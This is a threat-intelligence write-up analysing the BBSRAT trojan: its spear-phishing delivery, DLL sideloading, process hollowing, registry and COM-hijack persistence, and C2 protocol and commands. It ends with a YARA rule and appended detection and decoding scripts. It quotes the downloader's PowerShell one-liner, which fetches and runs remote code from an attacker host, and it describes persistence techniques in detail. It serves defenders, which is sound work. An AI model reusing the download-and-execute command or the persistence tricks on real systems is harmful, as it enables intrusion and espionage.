POSTED BY: Bryan Lee and Josh Grunzweig on December 22, 2015 5:00 PM

FILED IN: Malware, Unit 42

TAGGED: AutoFocus, BBSRAT, Microsoft Office, PlugX, Roaming Tiger

In late 2014, ESET presented an attack campaign that had been observed over a period of time targeting Russia and other Russian speaking nations, dubbed “Roaming Tiger”. The attack was found to rely heavily on RTF exploits and, at the time, was thought to make use of the PlugX malware family. ESET did not attribute the attacks to a particular attack group, but noted that the objective of the campaign was espionage and general information stealing. Based on data collected from [Palo Alto Networks AutoFocus](https://www.paloaltonetworks.com/products/platforms/subscriptions/autofocus.html) threat intelligence, we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe, with a concentration of attacks in late October and continuing into December.

The adversaries behind these attacks continued to target Russia and other Russian speaking nations using similar exploits and attack vectors. However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool “BBSRAT.”

As described in earlier reports on “Roaming Tiger”, the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. The files exploit the well-known Microsoft Office vulnerability, CVE-2012-0158, to execute malicious code in order to take control of the targeted systems.

Figure 1 Spear-phishing email delivering BBSRAT

In one case, the adversary impersonated an individual from the organization Vigstar, a Russian-based research organization in charge of the development of satellite communications and special purpose wireless devices for the Russian Federation’s defense and security agencies. The targeted email address appeared to be a Gmail account associated with Vigstar as well, and was found on a job board website for a job opening at Vigstar.

The rough translation of the body of the email is as follows:

_I send you a “list of international exhibitions of military, civil and dual-purpose, conducted in 2015 on the territory of the Russian Federation and foreign states.” Waiting for your reply!_

Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015.

Figure 2 Decoy document that is opened after the malicious document has infected the system

In more recent months, we have identified several other potential Russian victims using AutoFocus. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the “Roaming Tiger” campaign, including transactiona[.]com and futuresgold[.]com. Interestingly, all of the previously published C2 domains have significant overlap amongst the hashes and IPs while C2s for BBSRAT contain no overlap at all. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each of the intended targets.

Figure 3 Command and control infrastructure

BBSRAT is typically packaged within a portable executable file, although in a few of the observed instances, a raw DLL was discovered to contain BBSRAT. When the dropper first runs, it will generate a path in the %TEMP% directory. The generated filename is 10-16 uppercase alphabetic characters, and ends with a ‘.TMP’ file extension. The dropper will continue to write an embedded cab file in this location.

```
%ALLUSERSPROFILE%\SSONSVR
%ALLUSERSPROFILE%\Application Data\SSONSVR
```

Using the built-in [expand.exe](https://support.microsoft.com/en-us/kb/80751) utility provided by Microsoft Windows, the dropper executes the following command, which will expand the CAB file and write the results to the provided directory:

```
expand.exe "%TEMP%\[temp_file]" Destination "[chosen_path]\SSONSVR"
```

This results in the following three files being written to the SSONSVR directory:

- aclmain.sdb
- pnipcn.dll
- ssonsvr.exe

The ‘ssonsvr.exe’ file is a legitimate Citrix executable that will be used to [sideload](https://attack.mitre.org/wiki/DLL_side-loading) the malicious ‘pnipcn.dll’ file. The ‘aclmain.sdb’ file contains code that will eventually be loaded by the ‘pnipcn.dll’ file.

The malware finally executes ‘ssonsvr.exe’ via a call to [ShellExecuteW](https://msdn.microsoft.com/en-us/library/windows/desktop/bb762153(v=vs.85).aspx).

Figure 5 Execution flow of dropper expanding CAB file

When ‘ssonsvr.exe’ is executed, and the pnipcn.dll file is loaded, it will begin by identifying the path to msiexec.exe, by expanding the following environment string:

```
%SystemRoot%\System32\msiexec.exe
```

It will then spawn a suspended instance of msiexec.exe in a new process. The malware proceeds to load code from the ‘aclmain.sdb’ file and performs process hollowing against this instance of msiexec.exe prior to resuming the process.

Figure 6 Sideloading execution flow

In order to ensure persistence, the following registry key is written on the victim’s machine:

```
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe : [path_to_ssonsvr.exe]
```

In the most recently observed sample of BBSRAT found in AutoFocus, the Trojan was deployed via a downloader that used the [Invoke-ReflectivePEInjection.ps1](https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1) script from the PowerSploit framework.

When the downloader executes, it will first decrypt the following two strings using a 5-byte XOR key of “\x01\x02\x03\x04\x05”:

```
"powershell -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://testzake[.]com/IR.ps1');Invoke-ReflectivePEInjection -PEUrl http://testzake[.]com/s.exe"

"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://testzake[.]com/IR.ps1');Invoke-ReflectivePEInjection -PEUrl http://testzake[.]com/s.exe"
```

These strings are then sequentially executed via calls to WinExec. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. The commands in question will download an executable file and run it within the context of the powershell process.

When the above commands are executed, the downloader will initially download the ‘IR.ps1’ powershell script from the specified URL:

Figure 7 Downloader downloading the Invoke-ReflectivePEInjection PowerSploit script

This Powershell script appears to have been pulled directly from the PowerSploit framework, with no modifications made. The malware then invokes this script with a URL that points to an additional executable file. This downloaded executable contains a copy of the BBSRAT malware family.

The downloader proceeds to drop either a 32-bit or 64-bit DLL file that will execute the two previously stated Powershell commands when the DLL is loaded. This DLL is dropped to one of the following locations:

```
%SYSTEMROOT%\web\srvcl32.dll
%APPDATA%\web\srvcl32.dll
```

Additionally, the following registry keys are set depending on the system’s CPU architecture:

```
HKU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32\ThreadingModel – "Both"
HKU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32\Default – [path_to_srvcl32.dll]
HKLM\SOFTWARE\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InprocServer32\ThreadingModel – "Both"
HKLM\SOFTWARE\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InprocServer32\Default – [path_to_srvcl32.dll]
```

The COM object for {42aedc87-2188-41fd-b9a3-0c966feabec1} is specific to ‘MruPidlList’, while the COM object for {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} is specific to ‘Microsoft WBEM New Event Subsystem’. This ensures that the DLL specified will load when Microsoft Windows starts. It is a technique that was used by the [ZeroAccess rootkit](https://nakedsecurity.sophos.com/2012/06/06/zeroaccess-rootkit-usermode/) when it initially surfaced.

After being loaded using one of the two techniques discussed, BBSRAT malware begins execution by loading the following libraries at runtime:

- ntdll.dll
- kernel32.dll
- user32.dll
- advapi32.dll
- gdi32.dll
- ws2_32.dll
- shell32.dll
- psapi.dll
- Secur32.dll
- WtsApi32.dll
- Netapi32.dll
- Version.dll
- Crypt32.dll
- Wininet.dll

The following mutex is then created to ensure a single instance of BBSRAT is running at a given time:

```
Global\GlobalAcProtectMutex
```

Throughout the execution of BBSRAT, it will dynamically load functions prior to calling them, as seen in the example below demonstrating BBSRAT making a call to the WSAStartup function:

Figure 8 BBSRAT calling WSAStartup function

The malware proceeds to parse the stored embedded network configuration and spawns a series of threads responsible for network communication. This includes a series of HTTP or HTTPS requests, such as the following:

```
GET /bbs/1/forum.php?sid=1 HTTP/1.1
Cookie: A46A8AA9-D7D6-43FB-959DC96E
Content-Length:
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1)
Connection: Keep-Alive
Host: transactiona[.]com
Cache-Control: no-cache
Accept: */*
Content-Type:
```

In the above example, the ‘1’ used both in the URI and the sid GET parameter is a global incremental counter. Every subsequent request made by BBSRAT increments this counter by one. Additionally, all variants of BBSRAT we have found use the same URL for command and control (C2) communication.

When first executed, the malware will exfiltrate data about the victim’s machine via a POST request to the ‘/bbs/[counter]/forum.php?sid=[counter]’ URL. All network data sent via POST requests uses a custom binary structure, defined as follows:

```c
struct network_header
{
    DWORD random;
    DWORD hardcoded0;
    DWORD hardcoded1;
    DWORD command;
    DWORD length_of_compressed_data;
    DWORD length_of_decompressed_data;
    DWORD unknown2;
    BYTE  compressed_data[];
};
```

The compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data:

```python
def decrypt(data):
    out = []
    for x in data:
        t = (ord(x) - 23)
        t1 = (t ^ 62)
        t2 = (t1 + 23) & 0xFF
        out.append(chr(t2))
    return out
```

The following data structure holds the victim’s information that is uploaded by BBSRAT:

```c
    /* the opening lines of this structure are missing from the source */
    DWORD major_version;
    DWORD minor_version;
    DWORD build_number;
    DWORD platform_id;
    DWORD default_locale;
    DWORD unknown;
    DWORD local_ip_address;
    DWORD running_as_64_bit;
    DWORD random;
    DWORD unknown2;
    DWORD struct_length;
    DWORD struct_with_not_used_length;
    DWORD struct_with_username_length;
    DWORD struct_with_group_length;
    DWORD unknown3;
    DWORD struct_with_hostname_length;
    WCHAR not_used[??];
    WCHAR username[??];
    WCHAR group[??];
    WCHAR hostname[??];
};
```

BBSRAT accepts many possible commands that the C2 server can provide. These commands are sent as a response to the GET beacons that are continually requested via either HTTP or HTTPS. The following commands and sub-commands have been identified:

|Command|Sub-command|Description|
|---|---|---|
|0x110010|N/A|Beacon|
|0x110011|N/A|Uninstall/Kill Malware|
|0x110020|N/A|Upload Victim Information|
|0x110064|0x2|Execute Command and Return Response|
|0x110064|0x4|Unknown|
|0x110064|0x5|Execute Shellcode|
|0x110066|0x7|Query Service Configuration|
|0x110066|0x9|Start Service|
|0x110066|0xa|Stop Service|
|0x110066|0xb|Delete Service|
|0x110066|0xc|Change Service Configuration|
|0x110063|0xd|Enumerate Running Processes|
|0x110063|0xf|Kill Process|
|0x110063|0x10|Get Process Information|
|0x110063|0x12|Free Library for Specified Process|
|0x110065|0x1b|Execute Command Quietly|
|0x110065|0x1e|Send Input to Console|
|0x110065|0x1f|Execute Shellcode|
|0x110061|0x20|List Drive Information|
|0x110061|0x21|List File Information For Given Directory|
|0x110061|0x23|Write File|
|0x110061|0x24|Read File|
|0x110061|0x25|List File Information For Given Directory|
|0x110061|0x27|Perform File Operation via SHFileOperation()|
|0x110061|0x28|Delete File|
|0x110061|0x29|Create Directory|
|0x110061|0x2a|Shell Execute|

Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers.

As in many of the previous articles regarding espionage-motivated adversaries and possible nation-state campaigns, what is being observed in this attack campaign is a continued operation and evolution by the adversary even after its tactics, techniques, and procedures (TTPs) have become public knowledge. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook. We urge organizations to use the data from Unit 42 and other threat intelligence sources to proactively secure themselves and prevent attacks.

[WildFire](https://www.paloaltonetworks.com/products/technologies/wildfire.html) properly classifies BBSRAT malware samples as malicious. We have released DNS signatures to block access to the C2 domain names included in this report. AutoFocus users can explore these attacks using the [BBSRAT malware family tag](https://autofocus.paloaltonetworks.com/#/tag/Unit42.BBSRAT).

```
// Several lines below are cut off at the right margin in the source.
rule bbsrat {
    meta:
        author = "Tyler Halfpop"
        company = "Palo Alto Networks"
        last_updated = "12-16-15"
    strings:
        $sa0 = "%ALLUSERSPROFILE%\\SSONSVR" fullword wide
        $sa1 = "%ALLUSERSPROFILE%\\Application Data\\SSONSVR" fullword wi
        $sa2 = "\\ssonsvr.exe" fullword wide
        $oa0 = { 83 E8 01 88 0C 04 75 F8 8B 44 24 40 89 4C 24 18 89 4C 24 1
        $oa1 = { 75 11 5F 5E B8 0D 00 00 00 5B 81 C4 ?? 07 00 00 C2 10 00 5
        $sb0 = "%systemroot%\\Web\\"
        $sb1 = "srvcl32.dll"
        $ob0 = { B8 67 66 66 66 F7 E9 D1 FA 8B C2 C1 E8 1F 03 C2 8D 04 80
        $ob1 = { 8D 84 24 18 02 00 00 50 C7 84 24 1C 02 00 00 94 00 00 00 F
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and (all of ($sa*) or al
}
```
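Added example, not part of the original report: a proxy-log check for the beacon layout described above, where the same incrementing counter appears in the `/bbs/[counter]/forum.php` path and in the `sid` parameter. The record layout `(client_ip, method, url, user_agent)`, the `min_hits` threshold and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# URI layout from the report: /bbs/[counter]/forum.php?sid=[counter]
BEACON_PATH = re.compile(r"^/bbs/(\d+)/forum\.php$")
# User-Agent shown in the report's sample request.
REPORTED_UA = "Mozilla/4.0 (compatible; Windows NT 5.1)"


def beacon_counter(url):
    """Return the counter if the URL matches the reported layout, else None."""
    parts = urlsplit(url)
    match = BEACON_PATH.match(parts.path)
    if not match:
        return None
    sid = parse_qs(parts.query).get("sid", [])
    # The path counter and the sid value must be the same number.
    if len(sid) != 1 or sid[0] != match.group(1):
        return None
    return int(match.group(1))


def find_beaconing(records, min_hits=3):
    """Flag clients with >= min_hits matching requests whose counters only increase.

    records: iterable of (client_ip, method, url, user_agent) in log order.
    """
    per_client = {}
    for client, method, url, user_agent in records:
        counter = beacon_counter(url)
        if counter is None or method not in ("GET", "POST"):
            continue
        entry = per_client.setdefault(client, {"counters": [], "ua_match": True})
        entry["counters"].append(counter)
        # Informational only: True while every hit carries the reported User-Agent.
        entry["ua_match"] = entry["ua_match"] and user_agent == REPORTED_UA
    flagged = {}
    for client, entry in per_client.items():
        seen = entry["counters"]
        increasing = all(b > a for a, b in zip(seen, seen[1:]))
        if len(seen) >= min_hits and increasing:
            flagged[client] = entry
    return flagged


# Constructed records, not captured traffic.
SAMPLE_LOG = [
    ("10.0.0.5", "GET", "/bbs/1/forum.php?sid=1", REPORTED_UA),
    ("10.0.0.9", "GET", "/bbs/7/forum.php?sid=abc123", "Mozilla/5.0"),
    ("10.0.0.5", "POST", "/bbs/2/forum.php?sid=2", REPORTED_UA),
    ("10.0.0.9", "GET", "/bbs/12/forum.php?sid=99", "Mozilla/5.0"),
    ("10.0.0.5", "GET", "/bbs/3/forum.php?sid=3", REPORTED_UA),
    ("10.0.0.7", "GET", "/bbs/4/forum.php?sid=4", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for client, entry in find_beaconing(SAMPLE_LOG).items():
        print(client, entry)
```

Requiring the path counter to equal `sid` is what separates this pattern from ordinary forum software that happens to use a `/bbs/` path.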
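Added example, not part of the original report: a decoder for captured POST bodies that combines the `network_header` layout, the ZLIB-compressed `compressed_data` field and the HTTP byte transform described above, for use when triaging traffic. Little-endian field order, the transform covering the whole body, the size cap and the placeholder header values in `build_sample` are assumptions; the command group labels summarize the report's table.

```python
import struct
import zlib

# struct network_header from the report: seven DWORDs, then compressed_data[].
# Little-endian byte order is an assumption (x86 Windows malware).
HEADER = struct.Struct("<7I")
MAX_DECOMPRESSED = 1 << 20  # analyst-chosen cap, not a value from the report

# Command IDs from the report's table; group labels are this example's summary.
COMMANDS = {
    0x110010: "Beacon",
    0x110011: "Uninstall/Kill Malware",
    0x110020: "Upload Victim Information",
    0x110061: "file operations (sub-commands 0x20-0x2a)",
    0x110063: "process operations (sub-commands 0xd-0x12)",
    0x110064: "command/shellcode execution (sub-commands 0x2-0x5)",
    0x110065: "console/shellcode execution (sub-commands 0x1b-0x1f)",
    0x110066: "service operations (sub-commands 0x7-0xc)",
}


def http_transform(data: bytes) -> bytes:
    """Python 3 bytes form of the report's decrypt(); applying it twice is a no-op."""
    return bytes((((b - 23) ^ 62) + 23) & 0xFF for b in data)


def parse_post_body(body: bytes, over_http: bool) -> dict:
    """Decode one POST body. Assumes the HTTP transform covers the whole body."""
    if over_http:
        body = http_transform(body)
    if len(body) < HEADER.size:
        raise ValueError("body shorter than network_header")
    _rnd, hc0, hc1, command, clen, dlen, _unk2 = HEADER.unpack_from(body)
    blob = body[HEADER.size:HEADER.size + clen]
    if len(blob) != clen:
        raise ValueError("compressed_data is truncated")
    if dlen > MAX_DECOMPRESSED:
        raise ValueError("declared decompressed length exceeds cap")
    inflater = zlib.decompressobj()
    try:
        # Bounded inflate: never produce more than one byte past the declared size.
        data = inflater.decompress(blob, dlen + 1) if clen else b""
    except zlib.error as exc:
        raise ValueError("compressed_data is not valid zlib") from exc
    if len(data) != dlen or (clen and not inflater.eof):
        raise ValueError("decompressed size disagrees with header")
    return {
        "command": command,
        "command_name": COMMANDS.get(command, "not in published table"),
        "hardcoded": (hc0, hc1),
        "data": data,
    }


def build_sample(command: int, payload: bytes, over_http: bool) -> bytes:
    """Constructed test input in the same layout; header constants are placeholders."""
    blob = zlib.compress(payload)
    body = HEADER.pack(0x11223344, 0, 0, command, len(blob), len(payload), 0) + blob
    return http_transform(body) if over_http else body


if __name__ == "__main__":
    sample = build_sample(0x110020, b"constructed victim-info bytes", over_http=True)
    print(parse_post_body(sample, over_http=True))
```

Because the byte transform is its own inverse, the same routine both removes and reproduces the HTTP obfuscation, which is why `build_sample` can reuse it to create test input.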